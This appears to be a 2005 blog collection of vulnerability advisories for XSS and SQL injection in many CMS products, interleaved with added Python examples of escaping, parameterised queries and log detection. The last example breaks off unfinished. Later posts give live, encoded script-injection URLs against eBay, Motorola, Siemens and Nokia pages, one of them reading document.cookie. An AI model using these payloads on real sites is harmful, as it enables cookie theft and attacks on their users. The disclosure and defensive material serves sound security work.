- No training is required; once installed, the WANDSOFT e-SEARCH functionality is automatic


Vuln. Description:

The WANDSOFT e-SEARCH contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

Wednesday, December 21, 2005

Merry Christmas!

I wish everyone a Merry Christmas, also on behalf of my comrades-in-arms!
Get properly drunk, smash all your neighbours' windows, etc., in that spirit...
But seriously, I really do wish everyone a Merry Christmas.

Oh yes, dear datuve folks, fix the "topic" parameter, or else one day the little ones will take you down like that.

That's all, everyone go rest now!!!

Text-e XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.text-e.com/
affected version:1.6.4 and prior

Product Description:

Text-e CMS is a full featured Content management solution which dramatically reduces the cost and the complexity associated with creating content-rich sites such as portals, collaborative applications, CRM and others.

Vuln. Description:

Text-e CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

    Tangora™ Portal CMS XSS vuln.

    Tangora™ Portal CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.tangora.com/
    affected version:4.0 and prior

    Product Description:

    Tangora™ Portal CMS makes it easy for small and mid-sized companies and organizations to communicate via web.

    All in one solution
    Tangora Portal CMS is modular standard software that enables you to create and manage a wide range of websites on one platform, using one tool.

    Tangora Portal CMS not only gives you the tools to manage practically any number of websites, it is web content management, portal management, application server, integration tools, and usage statistics in one advanced, but easy-to-use, package.




    Vuln. Description:

    Tangora Portal CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "action" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    example:

    /page1631.aspx?action=[XSS]
    /page496.aspx?action=[XSS]


    Note: for testing, the page number is the one belonging to the search function.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SyntaxCMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.syntaxcms.org/
    affected version:1.2.1 and prior

    Product Description:

    SyntaxCMS simplifies publishing various types of content to a site, facilitates creating and managing arbitrary relationships among content items, automates and accelerates custom development, and encourages reuse of site components with other SyntaxCMS installations. It is built using PHP and MySQL and is licensed under the Common Public License.


    Vuln. Description:

    SyntaxCMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "search_query" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /search/?search_query=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SpireMedia CMS SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.spiremedia.com/
    affected version:mx7


    Product Description:

    The SpireMedia CMS is an enterprise class Content Management System for managing Websites, Intranets, and Extranets. It runs under the ColdFusion application server and is platform neutral. The system is component-based, allowing object properties to be extended via custom components, and provides support for many applications such as message boards, calendaring, tech tips, user contributed content, etc. The SpireMedia CMS is currently deployed for such companies as Steamboat Ski and Resort, United Agri Products, GE Johnson Construction, Rocky Mountain Clothing Company, Qwest Incredible Internet, and many others.

    Vuln. Description:

    SpireMedia CMS contains a flaw that allows remote SQL injection attacks. Input passed to the "cid" parameter in "index.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SPIP XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.spip.net/en
    affected version:1.8.2 and prior

    Product Description:

    SPIP is a publishing system developed by the minirézo to manage the site uZine. We provide it to anyone as free software under the GPL license. Therefore, you can use it freely for your own site, be it personal, co-operative, institutional or commercial.

    Vuln. Description:

    SPIP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to parameters in the "spip_login.php3" and "spip_pass.php3" fields isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Speartek XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.speartek.com
    affected version:6.0 and prior


    Product Description:

    SpearTek's advanced solutions help you optimize the Internet channel to fuel ongoing business success. Our technology enables companies to leverage a single platform to manage content, email marketing and ecommerce applications, easily and cost-effectively. Whether you are a multi-million dollar enterprise or a start-up venture, our solutions advance your business objectives by delivering real return on investment while enhancing the customer experience.


    Vuln. Description:

    SpearTek contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SiteSage XSS vuln

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.starphire.com/
    affected version:5.0.18 and prior, SiteSage-EE, SiteSage-SE, SiteSage-SB, SiteSage-LE

    Product Description:

    SiteSage provides a completely non-technical web content management system for the creation and administration of your web site. Features include; built in Templates and Themes, Font Style Editor, WYSIWYG Content Editor, Message Boards, Mailing Lists, Sign up Forms, Banner Ad Manager, Dynamic Content Rotation, and much more. SiteSage is a complete ASP application for installation on your (or your hosting firm's) MS IIS web server. SiteSage is entirely server based permitting updates to a website to be made from work, home, or anywhere. SiteSage can be completely installed to your web server using standard FTP access. The Lite Edition is free for both commercial and non-commercial use.


    Vuln. Description:

    SiteSage contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "norelay_highlight_words" parameter when performing a search isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Sitekit CMS multiple XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.sitekit.net/
    affected version:v6.6 and prior

    Product Description:

    Sitekit CMS v6.6 enables non-technical business users to manage every aspect of their website with ease. Providing a fully supported, secure and managed service, Sitekit Content Management System Technology together with our UK wide Partner Network is your assurance of web excellence. Sitekit CMS has a comprehensive range of web management features such as E-Marketing, E-Business and Asset Managers, each designed to give you the power of the web at your finger tips. No fuss. No headaches. Just seamless performance. With four full product launches per year, Sitekit Solutions are relentless in providing the latest business benefits.
    * Top Search Engine Rankings
    * Leading Accessibility (Bobby AAA, W3C)
    * Ease of use
    * Strong Return on Investment
    * Flexible solution that can be scaled in size and function
    * Seamless integration with IT systems

    Vuln. Description:

    Sitekit CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "textonly", "locID", "lang" and "ClickFrom" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    examples:

    /default.aspx?[xss]
    /Default.aspx?textonly=[xss]
    /Default.aspx?textonly=1&locID=[xss]
    /Default.aspx?textonly=1&locID=0ad00v005&lang=[xss]
    /Request-call-back.html?ClickFrom=[xss]
    /registration-form.html?ClickFrom=[xss]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SCOOP! Multiple XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://scoop.cim.com.au/
    affected version:2.3 and prior


    Product Description:

    SCOOP! is the innovative Australian web content management system that will change the way we see and manage the content of our web sites. The SCOOP! web content management system allows web site managers and owners to publish and manage web site content without any HTML or web scripting knowledge. SCOOP! employs browser based editing of web content and template management. Content managers rather than programmers or IT departments, can publish text and images through an intuitive browser based interface, from anywhere, anytime.

    Vuln. Description:

    SCOOP! contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "keywords", "username", "area", "articleZoneID" and "r" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    In addition, an attacker can choose which parameters to show to the target, using "category.asp", "articleZone.asp", "account_login.asp", "lostPassword.asp" and "articleSearch.asp", because in those scripts the parameters aren't filtered; see the examples below:

    examples:


    /articleSearch.asp?keywords=[XSS]

    /lostPassword.asp?username=[XSS]

    /account_login.asp?Username=[XSS]

    /account_login.asp?Password=[XSS]

    /category.asp?area=[XSS]

    /category.asp?area=support&articleZoneID=[XSS]

    /category.asp?area=support&articleZoneID=132&r=[XSS]


    You can change to any parameter name you want in a script that uses some parameters :)

    /category.asp?pridels_Crew_XSS_r0t=[XSS]

    /articleZone.asp?r0t_r0t_r0t_r0t_r0t=[XSS]

    /account_login.asp?r0t_like_THIS=[XSS]

    /lostPassword.asp?GIVE_TO_r0t_ADMIN_PWD=[XSS]

    /articleSearch.asp?FIND_SCOOP!_BEST_CODERS=[XSS]

    /prePurchaserRegistration.asp?isn't_lame_2_purchase?=[XSS]

    /requestDemo.asp?_whata_*faq*?=[XSS]


    Solution:
    Edit the source code to ensure that input is properly sanitised.
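What "properly sanitised" means for this class of flaw is encoding untrusted input at the moment it is written into HTML, not filtering it on the way in. The following Python is an added example, not code from r0t's advisory or from SCOOP! (which is ASP); it models a hypothetical search page that echoes both parameter values and, as the examples above show, parameter names. The sample URL, the page markup and the check function are constructed for the illustration.

```python
"""Reflected XSS: echoing query-string input into HTML, unsafe versus encoded.

Added example, not code from r0t's advisories or from any product on this
page. It models a hypothetical search page that echoes the submitted
keywords, and (as the SCOOP! examples show) any parameter name, back into
the response; the products' own templates are not on the page.
"""
from html import escape
from urllib.parse import parse_qsl, urlsplit

# Constructed request: both a parameter value and a parameter name carry markup.
SAMPLE_URL = "/articleSearch.asp?keywords=%3Cb%3Ephones%3C%2Fb%3E&%3Ci%3Er0t%3C%2Fi%3E=1"


def parse_query(url):
    """Decode the query string into (name, value) pairs, names included."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def render_unsafe(params):
    """The flawed pattern behind the advisories: decoded input is pasted
    straight into the page, so markup in a name or value becomes live HTML."""
    items = "".join(f"<li>{name}: {value}</li>" for name, value in params)
    return f"<p>You searched for:</p><ul>{items}</ul>"


def render_safe(params):
    """Hardened form: every untrusted string is HTML-encoded at the point of
    output. quote=True also encodes ' and ", which keeps the same helper safe
    when the value lands inside an attribute such as value="...".
    """
    items = "".join(
        f"<li>{escape(name, quote=True)}: {escape(value, quote=True)}</li>"
        for name, value in params
    )
    return f"<p>You searched for:</p><ul>{items}</ul>"


def reflected_raw(page, params):
    """Defender's check: list every input string that reached the page with
    its '<' still intact, i.e. was reflected without encoding."""
    inputs = [s for name, value in params for s in (name, value)]
    return [s for s in inputs if "<" in s and s in page]


if __name__ == "__main__":
    params = parse_query(SAMPLE_URL)
    print("unsafe:", reflected_raw(render_unsafe(params), params))
    print("safe:  ", reflected_raw(render_safe(params), params))
```

Running the block lists the two inputs the unsafe renderer reflects intact and an empty list for the encoded one. The same escaping has to be applied everywhere a reflected value lands in the page, attribute values included, and JavaScript blocks need their own encoding rules; the check function here only looks for a '<' surviving into the output.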

    Scoop XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://scoop.kuro5hin.org/
    affected version: 1.1 RC1 and prior

    Product Description:

    Scoop is a "collaborative media application". It falls somewhere between a content management system, a web bulletin board system, and a weblog. Scoop is designed to enable your website to become a community. It empowers your visitors to be the producers of the site, contributing news and discussion, and making sure that the signal remains high.

    A Scoop site can be run almost entirely by the readers. The whole life-cycle of content is reader-driven. They submit news, they choose what to post, and they can discuss what they post. Readers can rate other readers' comments as well, providing a collaborative filtering tool to let the best contributions float to the top. Based on this rating, you can also reward consistently good contributors with greater power to review potentially untrusted content. The real power of Scoop is that it is almost totally collaborative.

    Of course, as an admin, you also may pick and choose which tools you want the community to have, and which will be available to admins only. Administrators have a very wide range of customization and security management tools available. All of the administration of Scoop is done through the normal web interface. Scoop will seamlessly provide more options to site administrators, right in the normal site, so the tools you need are always right where you need them.



    Vuln. Description:

    Scoop contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "type" and "count" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /?op=search&offset=0&old_count=30&type=[XSS]

    /?op=search&offset=0&old_count=30&type=story&topic=&section=&string=r0t&count=1[XSS]



    /story/2005/11/4/184932/452[XSS]
    /story/2005/11/4/184932[XSS]
    /story/2005/11/4[XSS]
    /story/2005/11[XSS]
    /story/2005[XSS]
    /story/[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Redakto WCMS multiple XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://computeroil.com/
    affected version:3.2 and prior

    Product Description:

    With our Content Management System Redakto, you and your team can easily maintain, organize and design your web presentation. No coding skills or the like are needed to get you up and running. Still, you will get all the flexibility to adjust your website to your needs.
    Within minutes you will be able to start filling in your content, insert images and documents, import your Word/Excel files, generate multilingual websites and much more. Redakto offers you an intuitive and easy to use user interface and can be used with every browser.


    Vuln. Description:

    Redakto WCMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "iid"/"iid2", "lang", "r", "cart", "str", "nf" and "a" parameters and to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:


    /index.tpl?iid=[XSS]

    /index.tpl?iid=l3a1b3&lang=[XSS]

    /index.tpl?iid=l3a1b3&lang=1&iid2=[XSS]

    /index.tpl?iid=l3a1b3&lang=1&iid2=3&r=[XSS]

    /index.tpl?iid=l093a1b1&lang=1&iid2=[iid2]&r=[r]&cart=[XSS]

    /index.tpl?iid=l093a1b1&lang=1&iid2=[iid2]&r=[r]&cart=11351542306899006&str=[XSS]

    /index.tpl?a=search_adv&cart=11351544339319101&lang=1&iid=13&nf=[XSS]

    /index.tpl?a=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    RAMSite R|1 CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://ramsiter1.imikalsen.com/
    affected version:1.0 and prior

    Product Description:

    The RAMSite R|1 CMS is an advanced, yet easy to use and lightweight, complete web-publishing solution. It is filled with useful and interesting features, and is built upon an architecture specifically designed to allow impressive development cycles for additional modules.

    Vuln. Description:

    RAMSite R|1 CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ProjectApp multiple XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:www.aspapp.com/content.asp?contentid=323
    affected version:v3.3 and prior

    Product Description:

    ProjectApp is a customizable groupware solution that provides a suite of project and task management tools to foster team communication. Track projects and tasks, share and distribute centralized docs and knowledge.

    Vuln. Description:

    ProjectApp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "keywords", "projectid", "ret_page" and "skin_number" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /forums.asp?keywords=[XSS]
    /search_employees.asp?keywords=[XSS]
    /cat.asp?keywords=[XSS]
    /links.asp?keywords=[XSS]
    /pmprojects.asp?projectid=[XSS]
    /login.asp?ret_page=[XSS]
    /default.asp?skin_number=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    IntranetApp XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:www.aspapp.com/content.asp?contentid=322
    affected version:3.3 and prior

    Product Description:

    IntranetApp gets groups on the same page with tools to enhance collaboration and communication. With this pre-built application you can create and manage company employees, news, events, projects, tasks, Web resources, documents and discussion forums. IntranetApp is completely Web based and customizable. Full source code (standard .asp) included.

    Vuln. Description:

    IntranetApp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "ret_page" parameter in "login.asp" and to the "do_search" and "search" parameters in "content.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /login.asp?ret_page=[XSS]

    /content.asp?CatId=&ContentType=&keywords=r0t&search=%3E&do_search=[XSS]

    /content.asp?CatId=&ContentType=&keywords=r0t&search=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SiteEnable XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.siteenable.com/
    affected version:3.3 and prior

    Product Description:

    SiteEnable is an open source Web application that combines content management and collaboration tools. It falls somewhere between a portal, content management system, a web bulletin board system and a collaborative application. SiteEnable is an instant website that is skinnable and standards-based. SiteEnable enables you or your staff to easily update content -- wherever and whenever you need. SiteEnable can be used as a content management system, business Website, collaboration tool, community, project management tool and other content-centric Web-based initiatives.

    Vuln. Description:

    SiteEnable contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "ret_page" parameter in "login.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:


    /login.asp?ret_page=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    PortalApp XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.portalapp.com/
    affected version:3.3 and prior


    Product Description:

    PortalApp is an open source Web application that combines content management with e-commerce and collaboration. It falls somewhere between a portal, content management system, a web bulletin board system, storefront and a collaborative application. PortalApp is an instant website that is skinnable and standards-based. PortalApp is designed to enable you to address 90% of the functionality that most Websites require. It enables you to sell on-line, manage members, and easily update content -- wherever and whenever you need. PortalApp can be used as a content management system, business Website, collaboration tool, community, project management tool and other content-centric Web-based initiatives.


    Vuln. Description:

    PortalApp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "ret_page" parameter in "login.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /login.asp?ret_page=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Polopoly XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.polopoly.com/
    affected version:9 and prior

    Product Description:

    Polopoly is 100% Java since 1996 and embraces standards and open architecture. The system is browser independent, DB independent, and platform independent. The system thrives in high traffic, personalized web environments.

    Vuln. Description:

    Polopoly contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Plexcor's® CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.plexcor.com/
    affected version: 4.0 and prior

    Product Description:

    Integrated modular content, communications, calendar, commerce, customer and project management solution


    Vuln. Description:

    Plexcor contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    phpSlash SQL vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.php-slash.org/
    affected version:0.8.1 and prior

    Product Description:

    phpSlash is a CMS that provides an easy and flexible means to publish websites. It currently boasts full HTML templates, an OO design, the ability to operate in a hosted environment, and a bunch of other goodies.

    Vuln. Description:

    phpSlash contains a flaw that allows remote SQL injection attacks. Input passed to the "story_id" parameter in "article.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:

    /article.php?story_id=1[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Papoo Multiple SQL vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.papoo.org/
    affected version:2.1.2 and prior

    Product Description:

    Papoo is an easy to use, accessible CMS. Both its frontend and its administration respect the WCAG and ATAG rules. Papoo is Open Source.

    Vuln. Description:

    Papoo contains a flaw that allows remote SQL injection attacks. Input passed to the "menuid" parameter in "index.php" and "guestbook.php", and to the "forumid" and "reporeid_print" parameters in "print.php", isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    examples:

    /index.php?menuid=[SQL]
    /guestbook.php?menuid=[SQL]
    /print.php?reporeid_print=&forumid=[SQL]
    /print.php?reporeid_print=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.
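The phpSlash and Papoo flaws above share one shape: an integer id taken from the query string ("story_id", "menuid", "forumid") is dropped straight into a SQL statement. The following Python is an added example, not code from either project (both are PHP/MySQL); it assumes a hypothetical articles table keyed by story_id and uses sqlite3 in place of MySQL. The probe string "1 OR 1=1" is the textbook illustration of why concatenation fails, and the rows are constructed.

```python
"""SQL injection through an unsanitised numeric id, and the parameterised fix.

Added example, not code from phpSlash, Papoo or any other project on this
page. It assumes a hypothetical 'articles' table looked up by an integer
story_id, the kind of lookup the advisories describe; the products' own
queries are not on the page. sqlite3 stands in for MySQL.
"""
import sqlite3


def make_db():
    """Build an in-memory database with a few constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE articles (story_id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
        INSERT INTO articles VALUES (1, 'Public story', 1);
        INSERT INTO articles VALUES (2, 'Draft story', 0);
        INSERT INTO articles VALUES (3, 'Another draft', 0);
        """
    )
    return conn


def lookup_unsafe(conn, story_id):
    """Flawed pattern: the raw request parameter is concatenated into the
    statement, so anything after the number is parsed as SQL. With the
    probe "1 OR 1=1" the WHERE clause becomes
    (published = 1 AND story_id = 1) OR 1=1 and every row, drafts
    included, comes back."""
    sql = f"SELECT title FROM articles WHERE published = 1 AND story_id = {story_id}"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, story_id):
    """Hardened form: validate the type first, then bind the value as a
    parameter so the database never sees it as part of the statement."""
    try:
        story_id = int(story_id)
    except (TypeError, ValueError):
        return []  # reject anything that is not a plain integer
    sql = "SELECT title FROM articles WHERE published = 1 AND story_id = ?"
    return [row[0] for row in conn.execute(sql, (story_id,))]


if __name__ == "__main__":
    db = make_db()
    probe = "1 OR 1=1"  # constructed illustration of injected SQL
    print("unsafe, normal id :", lookup_unsafe(db, "1"))
    print("unsafe, probe     :", lookup_unsafe(db, probe))
    print("safe, normal id   :", lookup_safe(db, "1"))
    print("safe, probe       :", lookup_safe(db, probe))
```

Binding the value as a parameter is the fix; the int() conversion in front of it is belt and braces, rejecting anything that is not a plain number before the database is involved, which also covers the "1[SQL]" form shown in the phpSlash example where the injected text follows a valid id.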

    papaya CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.papaya-cms.com/
    affected version: 4.0.4 and prior

    Product Description:

    papaya CMS content management system and framework was designed for individual, mid-sized and enterprise wide deployments. The papaya CMS meets large-scale project requirements and offers extremely short implementation times. Since 2001, papaya CMS has been deployed at high profile customers such as AGOF (members include: AOL, GMX, Bauer, Gruner & Jahr, Web.de, Yahoo Inc., Lycos Inc. etc.), DHL and the Handelsblatt publishing group. papaya is based on proven OpenSource technologies such as PHP, XSLT/XML and supports RDBMS (e.g. MySQL and PostgreSQL). papaya has been OpenSource software (under the GPL license) since 2005. papaya Software GmbH delivers website creation and custom application development. More information: www.papaya-cms.com PLEASE NOTE: The website is only available in German until mid-June 2005. The GUI and the documentation are already available in English. In the meantime, feel free to check http://www.lamparea.org/papaya_software.28.html for a short description or to contact the maintainer of this project for further information.

    Vuln. Description:

    papaya CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "bab[searchfor]" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /suche.153.html?bab[page]=6&bab[searchfor]=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    HOW secure is ebay.com?

    You will see how secure it is after checking the live example below :)

    http://search.ebay.com/search/search.dll?sofocus=bs&sbrftog=1&fcl=4&from=R10&catref=C12&satitle=fur+trim*&sacat=63862%26catref%3DC6&bs=Search&fsop=1%26fsoo%3D1&fgtp=&a54=-24%3Cscript%3Ealert()%3C/script%3E&a22868=-24&a94=-24&gcs=1110&pfid=1283&reqtype=1&pfmode=1&alist=a54%2Ca55%2Ca22868%2Ca53%2Ca94%2Ca3801&pf_query=fur+trim*&sargn=-1%26saslc%3D2&sadis=200&fpos=94062&sappl=1&ftrt=1&ftrv=1&sabdlo=&sabdhi=&saprclo=%22%3E%3Cscript%3Ealert(5)%3C/script%3E&saprchi='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    I forgot SonyEricsson also made good phones

    I forgot about those great phones that SonyEricsson develops.

    manually:

    http://www.sonyericsson.com/spg.jsp?cc=be&lc=nl&ver=4000&template=ph1_3&zone=ps

    In the search field, enter: [XSS]

    SAGEM made phones:)

    I don't know many phone companies; the next one I remembered was Sagem, so here you go, their lame work!

    manually use:
    http://www.sagem-online.com/isa-b2c/b2c/accountForward.do

    In the email field, put: [XSS]

    Motorola isn't better:)

    This case isn't similar to the others, but it's a vuln anyway.
    In this case they chose to use the digitalriver service for their shop :)

    http://motorola.digitalriver.com/servlet/ControllerServlet?Action=DisplayHomeMotostorShopPage&SiteID=motostor&Locale=en_US&Env=%22%3E%3Cscript%3Ealert('Motorola,%20r0t%20like%20some%20phones%20,%20but%20not%20your%20coders,%20your%20coders%20suck!')%3C/script%3E

    http://motorola.digitalriver.com/servlet/ControllerServlet?Action=DisplayHomeMotostorShopPage&SiteID=motostor&Locale=%22%3E%3Cscript%3Ealert('Motorola,%20r0t%20like%20some%20phones%20,%20but%20not%20your%20coders,%20your%20coders%20suck!')%3C/script%3E

    Siemens XSS, or they have good phones, but no coders :)

    http://siemens.com/index.jsp?sdc_ggid=&sdc_tabidx=&sdc_countryid=0&sdc_flags=0&sdc_pnid=0&sdc_zoneid=1&sdc_langid=1&sdc_sectionid=0&sdc_contentid=255&sdc_linkid=1327885&sdc_sid=33514031252&sdc_rh=&sdc_bcpath=%22%3E%3Cscript%3Ealert('r0t%20loves%20siemens%20phones,but%20coders%20as%20always%20sucks!')%3C/script%3E

    http://siemens.com/index.jsp?sdc_ggid=&sdc_tabidx=&sdc_countryid=0&sdc_flags=0&sdc_pnid=0&sdc_zoneid=1&sdc_langid=1&sdc_sectionid=0&sdc_contentid=%22%3E%3Cscript%3Ealert('r0t%20loves%20siemens%20phones,but%20coders%20as%20always%20sucks!')%3C/script%3E

    Solution:

    Get better coders!



    PS. coders from siemens... lammers!

    NOKIA XSS or r0t loves noki

    http://www.nokia.com/search/index.jsp?wsid=8&qt=&charset=%22%3E%3Cscript%3Ealert('r0t%20loves%20nokia%20phones,%20but%20coders%20sucks!')%3C/script%3E

    solution:
    Get better coders!
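Every live URL in this post carries the same signature: a percent-encoded quote and closing bracket followed by an opening tag ("%22%3E%3Cscript%3E"), which is easy to pick out of web server logs once the query string is decoded. The following Python is an added example, not part of the original post; it assumes combined-format access log lines (the ones below are constructed, not real traffic) and inspects only the query string of each request line.

```python
"""Detecting reflected-XSS probes in web server access logs.

Added example, not part of the original post. It assumes combined-format
access logs (the lines below are constructed, not real traffic) and flags
requests whose percent-decoded query values contain an HTML tag, the
pattern the encoded URLs in the post all share: "%22%3E%3Cscript%3E..."
decodes to '"><script>...'.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed log lines: a benign search, two probes, and an ordinary request.
SAMPLE_LOG = """\
10.0.0.1 - - [21/Dec/2005:10:00:01 +0200] "GET /search/index.jsp?qt=i%3C3+nokia&charset=utf-8 HTTP/1.1" 200 5123
10.0.0.2 - - [21/Dec/2005:10:00:07 +0200] "GET /search/index.jsp?qt=&charset=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5301
10.0.0.3 - - [21/Dec/2005:10:00:09 +0200] "GET /index.jsp?sdc_contentid=255&sdc_bcpath=%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4410
10.0.0.4 - - [21/Dec/2005:10:00:15 +0200] "GET /article.php?story_id=12 HTTP/1.1" 200 2048
"""

# The quoted request line inside a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# A tag opening: '<' or '</', a tag name, then whitespace, '>' or '/'.
# Requiring a letter after '<' keeps plain text such as "i<3" from matching.
TAG_RE = re.compile(r"</?[A-Za-z][A-Za-z0-9]*[\s>/]")


def suspicious_params(target):
    """Return [(name, decoded_value)] for query parameters whose value contains a tag."""
    hits = []
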